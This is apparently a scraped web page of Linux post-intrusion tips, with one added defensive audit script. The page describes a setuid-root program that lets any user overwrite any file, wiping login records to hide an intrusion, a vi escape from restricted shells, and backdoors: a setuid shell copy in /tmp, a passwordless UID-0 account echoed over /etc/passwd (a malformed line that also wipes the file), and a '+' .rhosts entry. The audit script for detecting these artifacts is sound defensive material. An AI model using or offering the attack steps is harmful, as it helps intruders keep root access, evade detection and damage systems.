Common Linux intrusion tips

Source: Internet
Author: User

1 UPLOAD
After a successful intrusion you have root permission. You can then change the access permissions on the server so that anyone can upload files.
As root, run the install script shown below.
Afterwards, the upload program lets an ordinary user upload a file to any directory.
 

    # chmod 755 install
    # ./install
    $ more install
    #!/bin/csh -f
    cc upload.c
    cp a.out upload
    chown root upload
    chmod 755 upload
    chmod u+s upload
    $ more upload.c

 

    #include <stdio.h>
    #include <string.h>

    int upload(char *filename);

    int main(void)
    {
        char filename[48];

        printf("This program will upload up.txt ASCII file to specified file\n");
        printf("XXX Copyright Reserved\n");
        printf("Where to upload (include path and filename)? ");
        /* fgets replaces gets(): the read is bounded by the buffer size */
        if (fgets(filename, sizeof filename, stdin) == NULL)
            return 1;
        filename[strcspn(filename, "\n")] = '\0';   /* strip the newline */
        upload(filename);
        return 0;
    }

    /* Copy up.txt from the current directory to the given path. */
    int upload(char *filename)
    {
        FILE *fp, *outp;
        int c;                      /* int, so EOF can be told from data */

        fp = fopen("up.txt", "r");
        if (fp == NULL) {           /* comparison, not assignment */
            printf("file not exist.");
            return 0;
        }
        outp = fopen(filename, "w");
        if (outp == NULL) {
            fclose(fp);
            return 0;
        }
        while ((c = fgetc(fp)) != EOF) {
            printf("%c", c);        /* echo what is being written */
            fputc(c, outp);
        }
        fclose(fp);
        fclose(outp);
        return 1;
    }

2 Destroying the scene
After getting into a system, how do you clean up the scene before leaving and erase your footprints?

Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog.
Use a dedicated editor for this.


 

3 SHELL breakthrough
Many methods of attacking a system require the attacker to first have a command-line shell, such as /bin/csh. However, some systems give you only a menu-style custom shell, such as pink. To attack such a system, you must first break out of this custom shell.

We can use some vi commands (vi is the standard editor on UNIX) to do this. The process is as follows:
(1) Select the edit-file option in the custom shell; the system starts vi.
(2) In vi, enter the following command sequence (note: each command includes the leading ':'):
:set shell=/bin/csh
:shell
(3) At this point, just as when you select the DOS Shell item in the File menu of a DOS program, the system starts a shell. Because the shell was just set to /bin/csh, we get a command-line Unix shell.

 

 

4 Backdoor
It is a good habit to leave a backdoor after entering a system :) Here are some simple backdoor settings:
(1) setuid
# cp /bin/sh /tmp/.backdoor
# chmod u+s /tmp/.backdoor
Putting the suid bit on a copy of the shell is the easiest and most convenient.
(2) echo "wyj:0:0:/bin/csh" > /etc/passwd
This adds an account with id 0 (root) and no password to the system.
(3) echo "+ wyj" > /.rhosts
That is, the local user named wyj can rlogin to the target directly without a password. Here the name wyj works like a password: people who do not know it cannot get in. The prerequisite is that port 512, 513 or 514 is open on the target.
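
A defender's check for the artifacts that sections 1 and 4 leave behind (a set-uid file, an extra UID-0 or password-less account, a "+" trust entry), added here as an example and not part of the original page. The function names and the sample data are constructed for illustration; every path is passed in as an argument.

```shell
#!/bin/sh
# Added example: audit helpers for the artifacts described above.
# Every path is an argument, so the checks also run on copies or samples.

# UID-0 accounts other than root, and accounts with an empty password field.
audit_passwd() {
    awk -F: '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        $3 ~ /^0+$/ && $1 != "root" { print "uid0-account " $1 }
        NF > 1 && $2 == ""          { print "empty-password " $1 }
    ' "$1"
}

# .rhosts / hosts.equiv lines whose host or user field is a bare "+".
audit_rhosts() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        $1 == "+" || $2 == "+" { print "wildcard-trust " $0 }
    ' "$1"
}

# Set-uid regular files under a directory that should hold none (e.g. /tmp).
# find does not skip dot-files, so names like .backdoor are reported too.
audit_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null | sed 's/^/setuid-file /'
}

# Demo on constructed sample data (not taken from a real host).
demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' 'root:x:0:0:root:/root:/bin/sh' \
        'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
        'wyj::0:0::/:/bin/csh' > "$d/passwd"
    printf '%s\n' '# trusted peers' 'build.example.org alice' '+ wyj' > "$d/rhosts"
    mkdir "$d/tmp"
    : > "$d/tmp/.backdoor"                      # empty placeholder file
    chmod u+s "$d/tmp/.backdoor" 2>/dev/null || true
    audit_passwd "$d/passwd"
    audit_rhosts "$d/rhosts"
    audit_setuid "$d/tmp"
    rm -rf "$d"
}

demo
```

On a host, point the functions at /etc/passwd, each user's ~/.rhosts and /etc/hosts.equiv, and world-writable directories such as /tmp.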

 

5 Use telnet to upload files
If FTP is disabled and sendmail cannot be used either, how can I upload compiled files to the host?
The method is simple:
1. Encode the file to be uploaded with uuencode. The file will look like the following:
begin 644 file.bat
end
sum -r/size 17903/262
All are visible ASCII characters.


2. Connect to the host using telnet and enter
$ cat > a
Then copy and paste the file into the Windows telnet window.
Press ^D.
This generates file a in the current directory.


3. uudecode
Restore the file, and then run chmod.
